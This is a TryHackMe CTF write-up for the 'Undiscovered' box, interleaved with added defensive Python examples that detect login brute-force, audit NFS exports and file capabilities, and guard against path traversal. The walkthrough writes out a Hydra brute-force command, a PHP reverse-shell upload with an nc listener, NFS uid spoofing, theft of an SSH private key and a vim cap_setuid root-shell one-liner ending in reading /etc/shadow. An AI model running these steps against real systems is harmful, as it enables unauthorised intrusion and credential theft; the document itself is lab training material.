Hello. I’m Rahmos. Here is my Undiscovered — TryHackMe — WriteUp. Check it out!
First, add undiscovered.thm to your /etc/hosts. Then deploy the machine and scan for open ports with nmap:
nmap -A -T4 -p- -v <ip>
So there are 5 open ports: 22 (SSH), 80 (HTTP), 111 (RPC), 2049 (NFS), and 41693 (nlockmgr).
Let’s first access the website at port 80:
I checked the page source, but there is nothing valuable in it. So let's move on to finding hidden directories with gobuster:
gobuster dir -u http://undiscovered.thm -w /path-to-wordlist
However, I found nothing.
I also tried to list the mountable folders with showmount, but that didn't work either.
So next, I'll look for the site's subdomains using wfuzz:
wfuzz -c -f undiscovered.txt -w /path-to-wordlist -u "http://undiscovered.thm/" -H "Host: FUZZ.undiscovered.thm" --hw 290 --hc 404,302
I'll use the "SecLists" wordlist; you can find it here.
After wfuzz finishes, cat undiscovered.txt to see the results:
Well, I found many subdomains! Let's add one of them to /etc/hosts and access it. I'll choose "manager".
So it's running RiteCMS version 2.2.1. I looked for an exploit and found this link.
What I need to find now is the /cms login page. However, the "manager" subdomain doesn't have a /cms page, so I wrote a simple Python script to request /cms on every subdomain found above, and "deliver" is the right one.
According to the link, the default username:password is admin:admin. So let's try to log in.
However, these default credentials don't work. So I'll brute-force the password with Hydra:
hydra -l admin -P rockyou.txt deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong"
After a while, I got the password.
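From the defender's side, the Hydra run above leaves a very recognisable trace: a burst of POSTs to /cms/index.php from one client. The following Python detector is an added example, not part of the write-up or of RiteCMS; it assumes the web server writes Combined Log Format access logs, and the IP addresses, timestamps and log lines it runs over are constructed for the demo (only the /cms/index.php path and the failure message come from the write-up).

```python
# Added example (not part of the write-up): spot a Hydra-style login
# brute-force against the RiteCMS form in web-server access logs.
# Assumed: the server writes Combined Log Format lines; the IPs, timestamps
# and log lines below are constructed for this demo. Only /cms/index.php is
# taken from the write-up.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_lines(log_text):
    """Yield (ip, timestamp, method, path, status); skip lines that don't parse."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        yield (m["ip"], datetime.strptime(m["ts"], TS_FMT),
               m["method"], m["path"].split("?", 1)[0], int(m["status"]))


def detect_bruteforce(log_text, path="/cms/index.php", threshold=10,
                      window=timedelta(seconds=60)):
    """Return {ip: peak POST count to `path` inside any `window`} for every
    client whose peak reaches `threshold`.

    RiteCMS answers a failed login with HTTP 200 and the text
    "User unknown or password wrong" (the string Hydra keys on), so the
    status code alone does not separate failures from successes; the
    signal is the burst of POSTs to the login form from one client."""
    posts = defaultdict(list)
    for ip, ts, method, p, _status in parse_lines(log_text):
        if method == "POST" and p == path:
            posts[ip].append(ts)
    hits = {}
    for ip, times in posts.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):          # sliding window over sorted times
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[ip] = peak
    return hits


def _line(ip, second, method, path, status):
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 1423')


# Constructed sample: 10.0.0.5 fires 12 POSTs in 33 seconds (brute force);
# 10.0.0.9 browses and logs in once; one junk line tests the parser's tolerance.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", s, "POST", "/cms/index.php", 200) for s in range(0, 36, 3)]
    + [_line("10.0.0.9", 5, "GET", "/cms/index.php", 200),
       _line("10.0.0.9", 20, "POST", "/cms/index.php", 302),
       "this line is not an access-log entry"]
)

if __name__ == "__main__":
    for ip, n in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs within 60s")
```

The threshold and window are tuning knobs; a real user retyping a password a few times stays well under ten attempts a minute, while a wordlist run is hundreds per minute, so the two populations separate cleanly.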
Navigate to File Manager → Upload and upload the php-reverse-shell.
Now the shell has been uploaded. Start a listener:
nc -lvnp 4444
Access "deliver.undiscovered.thm/media/php-reverse-shell.php" to trigger it.
I've got a shell on the machine. Spawn a TTY shell using Python:
python -c 'import pty; pty.spawn("/bin/bash")'
There are 2 users in /home; however, I cannot access either home folder yet due to permissions.
So I'll find another way to get their credentials. Since there's a website, let's look in /var/www for any configuration files.
All subdomains of the website are there. Because I already know "deliver" is the right subdomain, let's look at its folder.
There are 2 hidden folders: data and files. There's nothing inside files:
So let's enumerate data further. However, the only thing in there is the admin's password, which I already know.
Let's find another way. Looking back at the nmap scan, there are NFS shares, but I couldn't access them from outside. Now that I have a shell on the machine, I can see which folders are shared with cat /etc/exports:
So the folder /home/william is shared and can be accessed. Let's see his uid and gid:
It's 3003. Create a user "william" on your machine with the same uid and gid, and mount the folder to see what's inside (with the default sec=sys flavour, the NFS server trusts whatever uid and gid the client presents).
useradd -u 3003 william
OK, so "william" has been created. Mount his home folder:
mount -t nfs <ip>:/home/william /home/william
Change william's shell to /bin/bash:
usermod --shell /bin/bash william
Then su william and access /home/william:
Get the 1st flag:
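The mount trick above works because of how the share is configured, not because of a bug: an export reachable from any host, with the default sec=sys flavour, accepts whatever uid the client claims. The following Python audit of an /etc/exports file is an added example, not part of the write-up; the exports content it parses is constructed for the demo (the write-up only shows that /home/william is exported, not the box's actual file).

```python
# Added example (not part of the write-up): audit an /etc/exports file for
# the conditions that make the uid-matching trick work. The exports content
# below is constructed for this demo; the write-up does not show the box's
# real file, only that /home/william is exported.

# Constructed sample. Real syntax: "<path> <client>(<opts>) [<client>(<opts>)...]"
EXPORTS_SAMPLE = """\
# constructed for the demo
/home/william *(rw,sync,no_root_squash)
/srv/backup 10.0.0.0/24(ro,sync,root_squash,no_subtree_check)
/srv/shared 10.0.0.7(rw,sync,sec=krb5p,root_squash)
/srv/legacy 10.0.0.0/24
"""


def parse_exports(text):
    """Yield (path, client, [options]) for each client of each export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()
        if not clients:                           # bare path: exported to everyone
            clients = ["*"]
        for client in clients:
            host, _, opts = client.partition("(")
            options = [o for o in opts.rstrip(")").split(",") if o]
            yield path, host, options


def audit_exports(text):
    """Return [(path, client, [issues])] for exports with weak settings."""
    findings = []
    for path, host, opts in parse_exports(text):
        issues = []
        if host in ("*", "") or host.startswith("*."):
            issues.append("exported to any host")
        if "no_root_squash" in opts:
            issues.append("no_root_squash: client root is root on the share")
        if "insecure" in opts:
            issues.append("insecure: requests accepted from unprivileged ports")
        if not any(o.startswith("sec=") and "krb5" in o for o in opts):
            # Default flavour is sec=sys (AUTH_SYS): the server trusts the
            # uid/gid the client presents, which is exactly what
            # "useradd -u 3003 william" relies on. Kerberos binds identity to
            # a ticket instead of a number the client chooses.
            issues.append("sec=sys: client-chosen uid/gid is trusted")
        if issues:
            findings.append((path, host, issues))
    return findings


if __name__ == "__main__":
    for path, host, issues in audit_exports(EXPORTS_SAMPLE):
        print(f"{path} -> {host}: {'; '.join(issues)}")
```

The sec=sys finding fires on every export that does not use Kerberos, which is noisy on purpose: restricting the client list is the practical mitigation on most networks, and the finding is there to make the trust assumption explicit.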
Now I'll find a way to get root and the final flag. First, change the permissions of /home/william to 777, so I can access it on the target machine as www-data (the directory is the NFS export, so the mode change made through the mount takes effect on the target too).
chmod 777 /home/william
There are 2 suspicious files inside william's home folder: admin.sh and script.
Use Ghidra to decompile script:
OK, so if I execute script without an argument, it runs admin.sh. But if I provide an argument, the argument is concatenated (strcat) into the path to read, and the file is read with leonard's privileges.
Go back to the reverse shell on the target machine. Let's try running script:
Let's see if leonard has a private SSH key:
Ah yes! Now I have leonard's private SSH key! Create a text file with the content of this private key, chmod 600 the file, and ssh to the machine as leonard!
And because leonard's private key has no passphrase, I'm in!
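The flaw in script is a general one: a privileged helper that builds the name of the file it reads by concatenating an untrusted argument, with nothing constraining where that path ends up. The Python below is an added example, not the decompiled binary and not from the write-up; it shows that pattern next to a hardened helper that resolves the path and refuses anything outside its base directory. The directory tree and file names it creates are constructed for the demo.

```python
# Added example (not part of the write-up, and not the decompiled `script`
# binary): the pattern the write-up describes, a privileged helper that builds
# the file to read by concatenating an untrusted argument, next to a hardened
# helper that resolves the path and refuses anything outside its base
# directory. The directory tree and file names below are constructed.
import os
import tempfile


def read_unsafe(base_dir, name):
    """Vulnerable pattern (like strcat(base, argv[1]) in the binary):
    "../" segments in `name` walk out of base_dir, so whoever can run the
    helper reads any file its effective uid can open."""
    with open(base_dir + "/" + name, "rb") as f:
        return f.read()


def read_safe(base_dir, name):
    """Hardened pattern: canonicalise both ends, then require that the
    resolved target still lies under the resolved base."""
    base = os.path.realpath(base_dir)
    # realpath() collapses ".." and follows symlinks; os.path.join() drops
    # `base` entirely when `name` is absolute, which the check below catches.
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to read outside {base}: {name!r}")
    with open(target, "rb") as f:
        return f.read()


def demo():
    """Build a throwaway tree: `public` is what the helper is meant to serve,
    `private` holds a file it should never hand out. Returns
    (what the unsafe helper leaked, whether the safe helper refused "../",
     whether it refused an absolute path, what it returns for a legitimate name)."""
    with tempfile.TemporaryDirectory() as root:
        public = os.path.join(root, "public")
        private = os.path.join(root, "private")
        os.makedirs(public)
        os.makedirs(private)
        with open(os.path.join(public, "notes.txt"), "wb") as f:
            f.write(b"hello")
        with open(os.path.join(private, "id_rsa"), "wb") as f:
            f.write(b"CONSTRUCTED-SECRET")

        leaked = read_unsafe(public, "../private/id_rsa")

        def refuses(name):
            try:
                read_safe(public, name)
            except PermissionError:
                return True
            return False

        refused_traversal = refuses("../private/id_rsa")
        refused_absolute = refuses(os.path.join(private, "id_rsa"))
        legit = read_safe(public, "notes.txt")
        return leaked, refused_traversal, refused_absolute, legit


if __name__ == "__main__":
    print(demo())
```

For a setuid or file-capability helper the same check belongs in C (realpath() plus a prefix comparison) before any open(), and the allowed base should be the narrowest directory the helper actually needs.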
Let's check capabilities:
getcap -r / 2>/dev/null
Well, vim.basic has the cap_setuid capability. According to GTFOBins, run this command to get a root shell:
/usr/bin/vim.basic -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Oh wait, it's not working! Let's try again with py3 (Python 3):
/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Now I'm root! Get root's password hash from /etc/shadow; it's the final flag.
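The getcap sweep is just as useful to an administrator as to an attacker: any binary that embeds a scripting engine and carries cap_setuid can call setuid(0), which is all the final step above does. The Python below is an added example, not part of the write-up; it parses getcap output and flags the capabilities that amount to root. The getcap lines it runs over are constructed for the demo (only /usr/bin/vim.basic with cap_setuid comes from the write-up), and it handles both the older "path = caps" and the newer "path caps" output styles.

```python
# Added example (not part of the write-up): parse `getcap -r / 2>/dev/null`
# output and flag binaries carrying capabilities that hand out root-equivalent
# power. The output lines below are constructed for this demo; only
# /usr/bin/vim.basic with cap_setuid comes from the write-up.
import re

# Capabilities that let a process become root or bypass DAC checks outright.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module",
    "cap_chown", "cap_fowner",
}

# Constructed sample mixing the two output styles getcap has used:
# older libcap prints "path = caps", newer releases print "path caps".
GETCAP_SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/vim.basic = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/usr/local/bin/python3.8 cap_setuid,cap_net_bind_service=eip
"""


def parse_getcap(text):
    """Yield (path, {capability names}) per line; paths containing spaces
    are not handled by this simple splitter."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if " = " in line:
            path, capstr = line.split(" = ", 1)
        else:
            path, capstr = line.rsplit(" ", 1)
        # "cap_a,cap_b+ep" / "cap_a,cap_b=eip": names precede the first +/=/-
        names = re.split(r"[+=-]", capstr, maxsplit=1)[0]
        yield path, {c.strip() for c in names.split(",") if c.strip()}


def audit_caps(text):
    """Return [(path, [dangerous caps])] for every binary carrying one."""
    return [(path, sorted(caps & DANGEROUS))
            for path, caps in parse_getcap(text) if caps & DANGEROUS]


if __name__ == "__main__":
    for path, caps in audit_caps(GETCAP_SAMPLE):
        print(f"{path}: {', '.join(caps)}  (remove with: setcap -r {path})")
```

Capabilities are inspected per file and are not reported by the usual SUID hunts (find -perm -4000), so this sweep belongs in a baseline next to the SUID list; setcap -r strips all capabilities from a file once a finding has been confirmed as unnecessary.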